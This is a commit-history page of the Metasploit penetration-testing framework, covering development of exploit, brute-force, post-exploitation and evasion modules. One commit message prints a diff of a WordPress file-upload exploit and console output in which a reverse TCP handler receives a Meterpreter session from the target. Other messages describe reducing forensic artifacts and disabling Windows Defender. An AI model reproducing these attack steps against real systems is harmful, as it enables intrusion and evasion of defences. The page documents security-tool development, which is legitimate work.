Commit Graph

25332 Commits (d41f48853a42944107e35317fefcad863ec67558)

Author SHA1 Message Date
Elazar Broad 6fe7bb0bb6
Increase sleep time to 10 seconds
Increase the wait time before removing the registry key - allows the payload to spawn successfully on slow systems.
2018-10-29 12:55:03 -04:00
root b705059bca Added channel name length check 2018-10-28 20:18:58 +00:00
root 60aa1181ca Add IBM WebSphere MQ Login Bruteforce module
Used to bruteforce usernames that can connect to the Queue Manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
  * Download and install MQ Server from the above link
  * Create a new Queue Manager
  * Create a new channel (without SSL)
  * Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
  * Run the module
2018-10-28 19:29:45 +00:00
pkb1s 92d5ab469c
Update ibm_mq_channel_brute.rb 2018-10-28 18:21:54 +00:00
Brendan Coles 1c340f8202
Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit 2018-10-28 18:17:46 +00:00
Brendan Coles 296d9a08eb
Removing unnecessary line
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:51 +00:00
Brendan Coles 3e3be18189
Using print_line instead of print("\n")
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:14 +00:00
Brendan Coles f8c829dc81
Using print_line instead of print("\n")
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:09 +00:00
Brendan Coles 67e8a7ce13
Changing CHANNELS_FILE option type
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:08:12 +00:00
Brendan Coles f51a95465e
Changed http to https in metasploit url
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:07:20 +00:00
pkb1s a6135e3738
Added "increase timeout" message 2018-10-28 17:48:15 +00:00
root 02d9d0f006 Add IBM WebSphere MQ Queue Manager Name and MQ Version Enumeration module
Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
  * Download and install MQ Server from the above link
  * Create a new Queue Manager
  * Create a new channel (without SSL)
  * Run the module
2018-10-28 16:09:17 +00:00
root a23cb7dfe8 Add IBM WebSphere MQ Channel Name Bruteforce module
Uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
** Download and install MQ Server
** Create a Queue Manager
** Create a new channel (without SSL)
** Run the module
2018-10-28 15:22:27 +00:00
kr3bz 370bcaf8d8
Update mercury_login.md 2018-10-28 09:49:15 +01:00
Brendan Coles a34310095c
Update modules/exploits/windows/imap/mercury_login.md
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
2018-10-28 09:41:29 +01:00
Brendan Coles bfd3a17c0e
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
2018-10-28 09:41:14 +01:00
kr3bz 5efbefdaea
Update mercury_login.md 2018-10-28 09:37:47 +01:00
kr3bz 2839a73cbd
Update mercury_login.rb 2018-10-28 09:35:15 +01:00
Spencer McIntyre 52fee303d4 Remove the size restriction from payload_inject 2018-10-27 21:26:09 -04:00
Spencer McIntyre caf76a6555 Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00
kr3bz c61737bb18
Update mercury_login.md 2018-10-27 20:52:54 +02:00
kr3bz 239632ca03
Update mercury_login.md 2018-10-27 20:52:24 +02:00
kr3bz 3cf8a01b55
Update mercury_login.md 2018-10-27 20:51:31 +02:00
Brendan Coles 965c2d5c01
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-26 13:37:37 +02:00
bwatters-r7 b4c005c4d4
Land #10561, Add Windows local privilege escalation - CVE-2018-0824
Merge branch 'land-10561' into upstream-master
2018-10-25 13:22:31 -05:00
William Vu e1a7c35834 Clean up check_banner 2018-10-25 05:20:20 -05:00
Green-m f90992dc08
Fix typo. 2018-10-25 17:55:01 +08:00
Green-m 760b14e71d
Update the version match code. 2018-10-25 15:33:54 +08:00
Wei Chen 2ab9a003d4
Land #10864, Add Cisco WebEx RCE Modules 2018-10-24 16:20:00 -05:00
Wei Chen f52cbdf9d7 Change option types 2018-10-24 16:18:17 -05:00
Wei Chen 4ec7e41f9e Change option type 2018-10-24 16:16:03 -05:00
Wei Chen e84ba62740 Cosmetic changes for local/webexec 2018-10-24 16:13:47 -05:00
Elazar Broad 16d633fabd
Remove spaces before EOL 2018-10-24 11:04:41 -04:00
Shelby Pace 3729e9ed7b
added description, references 2018-10-24 09:46:00 -05:00
kr3bz 2e2d742ae7
Added updated mercury_login
Added additional space for the payload, made recommended changes, msftidy does not produce errors, readded null byte as a badchar.
2018-10-24 11:08:37 +02:00
William Vu 458f635159 Add supported payloads to module description 2018-10-24 01:30:27 -05:00
William Vu 839c4e0467 Drop rank to AverageRanking for now 2018-10-24 01:30:17 -05:00
William Vu 37560760df Add RequiredCmd for generic and telnet 2018-10-24 01:23:15 -05:00
Elazar Broad ef2854c918
Use in-memory reflection for executing the payload
Use to_win32pe_psh_reflection() instead of to_win32pe_psh_net() in order to reduce the amount of processes and forensic artifacts created by this module.
2018-10-23 22:12:10 -04:00
Elazar Broad d75c599929
Use ShellExecuteA to spawn eventvwr.exe
Use ShellExecuteA from railgun to spawn eventvwr.exe, as opposed to cmd /c. This reduces the amount of processes generated by this module.
2018-10-23 21:52:36 -04:00
Elazar Broad da4b424780
Fix typo in cleanup message 2018-10-23 21:33:49 -04:00
bwatters-r7 569c2e03c9
Fix exploit relics and documentation 2018-10-23 17:15:34 -05:00
William Vu 67f2933b58 Make fewer assumptions about Apache
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
2018-10-23 16:26:17 -05:00
egre55 d1111ace5d fixes 2018-10-23 17:19:14 -04:00
Shelby Pace 34ae9c38f9
added WebEx modules, arch check 2018-10-23 15:51:23 -05:00
bwatters-r7 927a29530b
Remove duplicated files 2018-10-23 12:31:18 -05:00
Brent Cook 65c0573738
Land #10848, improve play_youtube post module 2018-10-23 12:26:55 -05:00
Brent Cook e992b63520
Land #10856, add SSL support to php meterpreter 2018-10-23 11:59:09 -05:00
kr3bz be2ec76ed2
Added modified mercury_login.rb
Modified the script with recommendations.
2018-10-23 17:17:30 +02:00
William Vu 9c49acb924 Fail scanner instead of returning 2018-10-23 10:07:38 -05:00
William Vu 58a1b65e60 Update Exploit::CheckCode::Unknown
Brain fart.
2018-10-23 09:34:48 -05:00
William Vu 899238a4e3 Update libssh_auth_bypass with command output 2018-10-23 09:34:42 -05:00
Spencer McIntyre c71bbc1019 Remove spaces that msftidy caught 2018-10-23 10:13:44 -04:00
Brendan Coles 0e7259040d
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:53 +02:00
Brendan Coles 903f5e9ede
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:44 +02:00
Brendan Coles 0b37e29c9a
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:38 +02:00
Brendan Coles 43dd23042b
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:10 +02:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Spencer McIntyre 15e67de8fc Add the EMBED option for play_youtube.rb 2018-10-22 19:51:41 -04:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00
William Vu 8459aad215 Prefer aobleq over incl/cmpl/bleq in payload 2018-10-22 18:32:37 -05:00
William Vu 01d11e71db Add Space, BadChars, Encoder, and DisableNops 2018-10-22 18:32:37 -05:00
William Vu fa892d8eba Add Morris worm fingerd stack buffer overflow 2018-10-22 18:32:37 -05:00
William Vu 8f2df4864c Add 4.3BSD VAX reverse command shell payload 2018-10-22 18:32:37 -05:00
Jeffrey Martin 380aaf7889
bump payloads gem 2018-10-22 18:20:45 -05:00
William Vu e6bbc6dbd6
Land #10845, glassfish_traversal typo fix 2018-10-22 15:32:14 -05:00
pasta 8d9bd33222 new version using Metasm 2018-10-22 16:36:04 -03:00
blue-bird1 6125ef06ad fix small typo 2018-10-23 00:01:13 +08:00
Luisco100 74683ce951 Add Windows Post Module to disable Windows Defender signatures 2018-10-21 12:07:54 -05:00
William Vu 58a6c4137d Add a better timeout than expect can provide 2018-10-20 13:56:37 -05:00
William Vu a965abaf36 Add full payload support by setting $PATH 2018-10-20 13:56:33 -05:00
William Vu 60c4b87ad1 Prefer expect over sleeping between writes 2018-10-20 13:15:15 -05:00
William Vu ad6f15c8ca Add Morris worm sendmail debug mode exploit 2018-10-20 13:15:01 -05:00
Brendan Coles 7a36056713 Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec 2018-10-20 18:16:59 +00:00
William Vu aae74472d2
Land #10817, QNX qconn module rename 2018-10-20 03:10:22 -05:00
Brent Cook accf9edf89
Land #10835, libssh fingerprint improvements 2018-10-19 19:48:23 -05:00
bwatters-r7 47353553e5 Get everything together finally (still needs cleanup) 2018-10-19 18:15:44 -05:00
bwatters-r7 a6be9e573f
Should have saved the actual file... 2018-10-19 16:30:21 -05:00
bwatters-r7 eeec3c115e
This is as far as I can take it for an exploit module
but it still does not work.  Commiting for posterity.
2018-10-19 16:12:47 -05:00
William Vu abd425c863
Land #10819, os_name population for ssh_login* 2018-10-19 15:53:38 -05:00
William Vu db7bd3d50c Update style 2018-10-19 15:52:26 -05:00
William Vu 2a1dec45ed
Land #10832, TARGETURI for tomcat_utf8_traversal 2018-10-19 15:47:37 -05:00
William Vu e4c71265fb Improve banner checking in libssh_auth_bypass
Now we do the right thing when libssh is patched.
2018-10-19 15:21:12 -05:00
pasta 3a02e9e80f First release, messagebox payload for x64 2018-10-19 16:39:41 -03:00
Spencer McIntyre 65d26d3a1e Use the DISPLAY environment variable when available 2018-10-19 14:35:35 -04:00
William Vu 21397330f8 Refactor fortinet_backdoor copypasta 2018-10-19 00:07:18 -05:00
William Vu 863ab3447f Add libssh auth bypass module 2018-10-18 23:03:23 -05:00
Wei Chen 3cee96d8ed
Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference 2018-10-18 14:42:14 -05:00
Wei Chen fac05db154 Update rescue statement 2018-10-18 14:30:20 -05:00
Brendan Coles 02c916b1b4 Update modules/auxiliary/admin/http/tomcat_utf8_traversal.rb 2018-10-19 04:16:26 +11:00
Patrick Webster 175e5e5adf Added module TARGETURI support. 2018-10-19 03:55:45 +11:00
Tim W b3d45586db feedback from code review 2018-10-18 12:30:46 +08:00
Tim W 64e257649f cleanup module 2018-10-18 11:45:59 +08:00
Tim W 290d4428c1 create git mixin 2018-10-18 11:31:31 +08:00
Tim W 063e477ff2 git submodule url exec (CVE-2018-17456) 2018-10-18 11:02:28 +08:00
bwatters-r7 d2c013001d
Update stuff 2018-10-17 17:17:05 -05:00
h00die 763506f28d ssh_login now populates the os_name field 2018-10-16 22:02:44 -04:00
h00die 4a06fe1d4b use store_valid_credential instead 2018-10-16 14:01:49 -04:00
Brendan Coles a14df8d86e Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec 2018-10-16 16:21:28 +00:00
Shelby Pace 9e069c95f5
add auto targeting 2018-10-15 23:26:08 -07:00
Shelby Pace 6cdfe604d4
removed exception handling for reg_file_for_handle 2018-10-15 18:29:15 -07:00
Wei Chen a19046dedb
Land #10793, improve windows_defender_js_hta 2018-10-15 17:42:21 -05:00
Wei Chen 8e442cc980 Update documenation 2018-10-15 15:45:39 -05:00
Wei Chen b0313dd25c Update getgodm_http_response_bof for proper auto targets 2018-10-15 15:25:55 -05:00
Wei Chen ff9f3ed9ff Add support for v5 2018-10-15 15:14:12 -05:00
Wei Chen 5433d2cca9 Sync up upstream master 2018-10-15 14:19:07 -05:00
Dhiraj Mishra f78ccbf995
Indentation 2018-10-15 08:32:58 +05:30
h00die 8877582086
Land #10668 rsh stack clash solaris priv esc 2018-10-14 10:34:48 -04:00
h00die f399b59ae4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into cisco_device_manager 2018-10-13 13:31:20 -04:00
Shelby Pace a942654515
rescue-from-method addressed 2018-10-12 14:47:05 -05:00
Shelby Pace 26631bcfbd
addressed suggestions 2018-10-12 14:35:42 -05:00
William Vu 5b14d94957
Land #10671, struts2_namespace_ognl updates
There are still some outstanding concerns, but I want to unblock this.
2018-10-12 11:08:33 -05:00
William Vu 2989507b85 Copy check for data_header to avoid crash
Variable was used but out of scope.
2018-10-12 11:06:26 -05:00
Dhiraj Mishra 96eeaf7da3
Made few changes
Thank you bcoles
2018-10-12 11:47:53 +05:30
h00die f675ba5243 password not username 2018-10-11 17:08:03 -04:00
h00die 20a376130e cat variable name 2018-10-11 17:04:57 -04:00
h00die 7cc46df6db add docs and update cisco_device_manager 2018-10-11 17:01:38 -04:00
Shelby Pace a67122aaf7
updated doc, added x86_64 binary 2018-10-11 12:37:51 -05:00
Shelby Pace 521b50af55
added separate binaries, extended for x86 2018-10-11 10:43:35 -05:00
amaloteaux f8ad47d475 improve windows_defender_js_hta :
-add platform detection for jsc
-prevent cmd prompt when launching jsc
2018-10-11 17:38:47 +02:00
Alex Gonzalez 1da99c8bd1
Fixed syntax errors
Corrected redundant returns and indentation errors
2018-10-11 10:01:47 -04:00
Alex Gonzalez 86f7c270c6
Fixed stylistic and syntax errors 2018-10-11 09:19:35 -04:00
l9c ed2ba1cb00 add support for ProcessName option, defaults to spoolsv.exe 2018-10-11 17:23:59 +08:00
l9c ce848712dd add support for ProcessName option, defaults to spoolsv.exe 2018-10-11 10:56:07 +08:00
Patrick DeSantis c0aff8f134
Description update / typo fix
fix typo in module description (added one word)
2018-10-10 17:56:17 -04:00
Shelby Pace 04cc40136f
changed formatting, deleted post, renamed files 2018-10-10 14:41:14 -05:00
Shelby Pace 76325bd21e
fixed indentation 2018-10-10 14:18:44 -05:00
Jacob Robles fb689da24c
Land #10335, Add vlc_mkv exploit module 2018-10-10 13:47:08 -05:00
Alex Gonzalez 0f3917f540
Fixed syntax errors 2018-10-10 13:26:49 -04:00
Jacob Robles 50a7ee5e6a
Minor modifications 2018-10-10 12:22:47 -05:00
Dhiraj Mishra ee2c6274c7
Updating description 2018-10-10 22:26:07 +05:30
Dhiraj Mishra 4a821101ce
Fixing cmd_exec_get_pid 2018-10-10 21:59:46 +05:30
Jacob Robles 796579e265
Use fail_with 2018-10-10 11:24:16 -05:00
Jacob Robles 4beb434054
Default Payloads
exploit:vlc_mkv default target payloads
2018-10-10 11:23:17 -05:00
Dhiraj Mishra c1c07d5c8f
Updating
Suggestion given by Shelby
2018-10-10 21:30:12 +05:30
Brendan Coles 8826932f72 Fix syntax errors 2018-10-10 14:39:07 +00:00
Brendan Coles 15cfeb37ea CamelCase 2018-10-10 14:35:34 +00:00
Brendan Coles 7a048afd14 Make WritableDir an advanced option 2018-10-10 14:12:29 +00:00
Dhiraj Mishra dbcee56995
Fixing spaces at EOL 2018-10-10 15:10:58 +05:30
Dhiraj Mishra 619a07fc3c
Update 2018-10-10 14:21:08 +05:30
Jeffrey Martin 6cdfbdd281
Land #10554, Rescue REX runtime errors in x86 encoders 2018-10-09 22:52:48 -05:00
Jacob Robles 1cb8418b2d
Filename options
exploit:vlc_mkv overwrite fileformat filename method
to supply options
2018-10-09 21:15:10 -05:00
Jacob Robles 94f260f289
exploit rand_text
exploit:vlc_mkv use rand_text functions defined in exploit.rb
2018-10-09 21:15:05 -05:00
Jacob Robles e07da5c518
EDB Ref Fix
exploit:vlc_mkv
2018-10-09 20:57:44 -05:00
Alex Gonzalez 26482ee6d6
Fixed EOL spaces 2018-10-09 18:30:41 -04:00
Alex Gonzalez 9c9cd33c34
Fixed syntax errors and inconsistencies 2018-10-09 17:45:02 -04:00
Jacob Robles af594f6744
Merge in master 2018-10-09 12:56:31 -05:00
Imran E. Dawoodjee c86f68cb60
Minor changes to module, updated documentation. 2018-10-09 20:39:00 +06:30
Imran E. Dawoodjee 4332c4cffd
Increased linemax from 128 to 2048. 2018-10-09 15:35:47 +06:30
Imran E. Dawoodjee 97b398963b
Suggestions by @bcoles implemented, randomized MAC 2018-10-09 14:02:56 +06:30
Dhiraj Mishra e2f9fb5d8e
Updating Indentation 2018-10-09 12:52:34 +05:30
Pedro Ribeiro 9bbd90f978
Style fixes and add full disc URL 2018-10-09 13:38:13 +07:00
Imran E. Dawoodjee 78624b7020
Updated documentation and fixed the code (mostly). 2018-10-09 10:52:06 +06:30
William Vu 9ec989a1bd Address @bcoles' review in #10672 2018-10-08 14:15:21 -05:00
Tod Beardsley 6e10718ed5
Format ZDI ref correctly. 2018-10-08 13:48:52 -05:00
Tod Beardsley f7d2815a01
Add a ZDI reference 2018-10-08 13:23:50 -05:00
Shelby Pace bed497c6ae
Land #10672, Add COMMGR Buffer Overflow module 2018-10-08 10:04:52 -05:00
Imran E. Dawoodjee 0fe989b42f
Code streamlining. 2018-10-08 21:12:27 +06:30
Imran E. Dawoodjee 4cc2c22026
Used a command stager, improved upon vulnerability detection and
generally attempted to streamline most of the code. Hardcoded one
vulnerable URI since it's the most likely to be present in all versions
of the vulnerable firmwares.
2018-10-08 20:51:58 +06:30
Dhiraj Mishra 56a39545c6
Updating 2018-10-08 16:40:19 +05:30
Dhiraj Mishra 097e9b8bfe
Indentation 2018-10-08 14:48:05 +05:30
Imran E. Dawoodjee b552b803bb
Still working on the HTTP stager. 2018-10-08 15:18:47 +06:30
Imran E. Dawoodjee fcb0b90d7a
Fixed numbering in the documentation steps, offed some whitespace,
streamlined the send_request_cgi, removed the conn_check.
2018-10-08 15:04:32 +06:30
Dhiraj Mishra b08c5ad597
Adding DefaultOptions 2018-10-08 13:24:48 +05:30
Pedro Ribeiro 22d0325d33
Add placeholder for full disclosure URL 2018-10-08 12:33:36 +07:00
Pedro Ribeiro 743a72dff6
Remove header from my own repo 2018-10-08 12:17:11 +07:00
Pedro Ribeiro f0443bbb57
Create cisco prime exploit 2018-10-08 12:16:24 +07:00
Imran E. Dawoodjee 3340cf529c
Fixed duplicate output for check. 2018-10-08 11:19:24 +06:30
Imran E. Dawoodjee 272f26640b
Added module for CVE-2016-1555 (netgear_unauth_exec)
and its corresponding wordlist file (netgear_boardData_paths.txt).
2018-10-08 10:22:59 +06:30
Dylan Pindur 94e45b12b1
Replace cmd generation with built-in stager module 2018-10-07 10:15:10 +08:00
Wei Chen 5951f5724e Pass msftidy 2018-10-06 16:04:07 -05:00
Dhiraj Mishra da525db6e9
Updating 2018-10-07 01:54:20 +05:30
Wei Chen 7c1fbf2c5a Update description 2018-10-06 09:22:35 -05:00
Wei Chen a25a7086b2 Rename file 2018-10-06 09:20:15 -05:00
Wei Chen c7efd57144
Sync up with master 2018-10-06 08:27:01 -05:00
Brent Cook 3d507250b0
Land #9745, Update QNX iwatchd to use newer APIs 2018-10-06 05:06:42 -04:00
Brent Cook c9ebe5ae23
Land #9745, Add ifwatchd QNX privilege escalation exploit module 2018-10-06 05:03:50 -04:00
Brendan Coles 89b6aafd85 Use register_file_for_cleanup 2018-10-06 04:37:04 +00:00
Brent Cook e2f97c75a0
Land #10616, update Unitrends UEB module to support vulnerabilities in version 10 2018-10-05 16:20:38 -05:00
Brent Cook a51243ce91
Land #10745, Update lastore_daemon_dbus_priv_esc tested versions 2018-10-05 11:35:31 -04:00
William Vu 7bc98e0ea8 Fix formatting and convert a missed AKA reference 2018-10-05 03:22:08 -05:00
William Vu d9cb052189 Fix improper use of the Ruby shovel operator (<<)
junk would be modified and returned, and we just want to return the
concatenated string. Practically doesn't matter, but it's incorrect.

This was my first public module. I've been wanting to fix this since.
I'm noticing it again now as I look for how I used Ret in a target.
2018-10-05 02:18:06 -05:00
Dylan Pindur 0f34f94496
Add back SSL options for tc-agent-xmlrpc-module 2018-10-05 15:11:13 +08:00
Dylan Pindur 8ae0bcbacd
Refactor if statements to be cleaner 2018-10-05 09:48:44 +08:00
bwatters-r7 28fb27187a
Land #10418, Add DCOM/RPC NTLM Reflection (MS16-075) Via Reflective DLL
Merge branch 'land-10418' into upstream-master
2018-10-04 16:54:53 -05:00
bwatters-r7 9a45c66db4 Fixed check to you know, check. 2018-10-04 16:38:35 -05:00
Brendan Coles fe7ce02dfd Update tested versions 2018-10-04 21:13:21 +00:00
William Vu 9f30512532
Land #10707, module traits to augment module rank 2018-10-04 13:26:14 -05:00
Jacob Robles 071aa04111
Land #10738, Add Zahir Enterprise 6 build 10b BOF 2018-10-04 11:00:12 -05:00
Wei Chen fb60558777
Land #10712, Make exploit/linux/http/axis_srv_parhand_rce more stable 2018-10-04 10:10:28 -05:00
Jacob Robles 060c68d2e0
Aligment, minor modifications 2018-10-04 10:10:09 -05:00
Jacob Robles 8b955f8ec5
Land #10704, Navigate CMS Unauthenticated RCE 2018-10-04 06:44:21 -05:00
Dhiraj Mishra 9f8f0b8885
Fixing carriage/spaces return at EOL 2018-10-04 15:41:46 +05:30
Dhiraj Mishra 783789d098
Updating 2018-10-04 15:01:06 +05:30
Brent Cook ff0ee51da1
Land #10686, ARGS, TIMEOUT, and output to upload_exec module
Merge remote-tracking branch 'upstream/pr/10686' into upstream-master
2018-10-04 04:28:02 -05:00
Thomas Gregory 144c76ecd4 Latest fix based on @jrobles-r7 recommendations
Fixing:
- MetasploitModule class changed
- Remove the word 'exploit' from name
- Remove StackAdjustment
- Remove Privileged option
- Remove make_nops(12)
- Remove extra buffer at the end of exploit
2018-10-04 16:18:02 +07:00
Thomas Gregory 991ac3c671 Fixing for msftidy
Fixing some format because still throw errors
2018-10-03 18:55:29 +07:00
Dylan Pindur 11d9b44922
Add exploit module for TeamCity Agent XMLRPC 2018-10-03 18:33:10 +08:00
Thomas Gregory cb5d68b641 Fixing based on msftidy.rb
Makes msftidy happy
2018-10-03 17:13:24 +07:00
William Vu e0a664c0cd Improve prints, use FileDropper, and bump TIMEOUT 2018-10-02 21:53:18 -05:00
bwatters-r7 428d368444
shut up, rubocop 2018-10-02 14:40:55 -05:00
bwatters-r7 64d53cd882
code cleanup 2018-10-02 14:06:25 -05:00
Fabio Poloni 4927f96f61
Fixed small typo 2018-10-02 15:57:57 +02:00
Jacob Robles 97729727d8
Minor modifications 2018-10-02 06:57:04 -05:00
Brent Cook faae2ac2f9
Land #10725, move post/android/gather/subinfo 2018-10-02 05:14:41 -05:00
Brent Cook 2c0d4de70b
Land #10732, add api key for android wlan_geolocate 2018-10-02 05:09:10 -05:00
Tim W 6dd36bd8da
Land #10427, add OSX VNC password gather module 2018-10-02 14:47:51 +08:00
Tim W b5cf682169 cleanup post/osx/gather/vnc_password_osx and add loot/credentials 2018-10-02 14:22:09 +08:00
Tim W b993d74f6c minor tweak 2018-10-02 11:41:58 +08:00
Tim W 5cfc19b804 fix post/multi/gather/wlan_geolocate on Android 2018-10-02 11:35:47 +08:00
Rob 6f5a8f8f42
Fix outdated metadata 2018-10-01 18:59:09 +01:00
space-r7 a0052c7f47 Add evasion module using HTA + JavaScript + C# 2018-10-01 12:57:05 -05:00
Tim W 37dc0ce64d fix post/android/gather/subinfo.rb path 2018-10-01 16:54:46 +08:00
Agora Security b678db8bb6 Remove spaces at EOL 2018-09-29 15:29:51 -04:00
modpr0be ff560ee990 Add test for Zahir 0day exploit
Add test for Zahir 0day exploit, need to test more e.g. VirtualBox or Physical machines.
2018-09-29 18:59:14 +07:00
Agora Security 8d1d6ff29f Create PureVPN Credential Collector Post Explotation Module 2018-09-28 12:00:34 -04:00
William Vu ee06ec2fda Background a subshell to continue execution
This provides a more stable injection. I should have tested this sooner.
2018-09-27 23:51:42 -05:00
William Vu 0dab5b622f Change default target to cmd/unix 2018-09-27 23:39:32 -05:00
William Vu e999b4d81c Lower rank to AverageRanking 2018-09-27 23:28:13 -05:00
William Vu 7a2d0acee6 Add basic check method and move rand_srv
The .srv can be random each request.
2018-09-27 23:28:13 -05:00
William Vu d29d936d6f Bump WfsDelay to 10 for this slow-ass device 2018-09-27 23:28:13 -05:00
asoto-r7 e4256f4595
Make ENABLE_STATIC an OptBool, as I should have done in the first place 2018-09-27 17:54:22 -05:00
Wei Chen 086e2b311b Update constants 2018-09-27 12:31:04 -05:00
Pyriphlegethon 342cfe4199 Refactor again 2018-09-27 12:38:05 +02:00
Pyriphlegethon 82b1f40925 Add cleanup code 2018-09-27 11:17:53 +02:00
Pyriphlegethon 2b86297138 Refactor 2018-09-27 11:16:54 +02:00
Pyriphlegethon f55483d17d Fix incorrect session_id extraction 2018-09-27 11:07:43 +02:00
Wei Chen 9064fac1ff Fix code based on Will's feedback 2018-09-26 21:13:37 -05:00
Wei Chen 583874d370 Update use of reliability/side-effects/stability metadata 2018-09-26 18:54:08 -05:00
William Vu 3bda794f00 Update upload_exec with chmod 2018-09-26 18:46:43 -05:00
Tim W 4adca52103 create chmod helper function 2018-09-26 18:46:42 -05:00
William Vu 81d020f810 Add a couple more Unix platforms
This is so we don't trigger the session compatibility warning. These
platforms have been worked on most recently.
2018-09-26 18:46:42 -05:00
William Vu a119465495 Tell the user when there's blank output 2018-09-26 18:46:42 -05:00
William Vu 6dd6e8abcb Change vprint to print because we test output
Fewer surprises this way when people don't set VERBOSE.
2018-09-26 18:46:42 -05:00
William Vu 42fab6266d Prefer vprint_line for better formatting 2018-09-26 18:46:42 -05:00
William Vu 40f19efe2c Don't use cmd.exe /c start so we can fetch output 2018-09-26 18:46:42 -05:00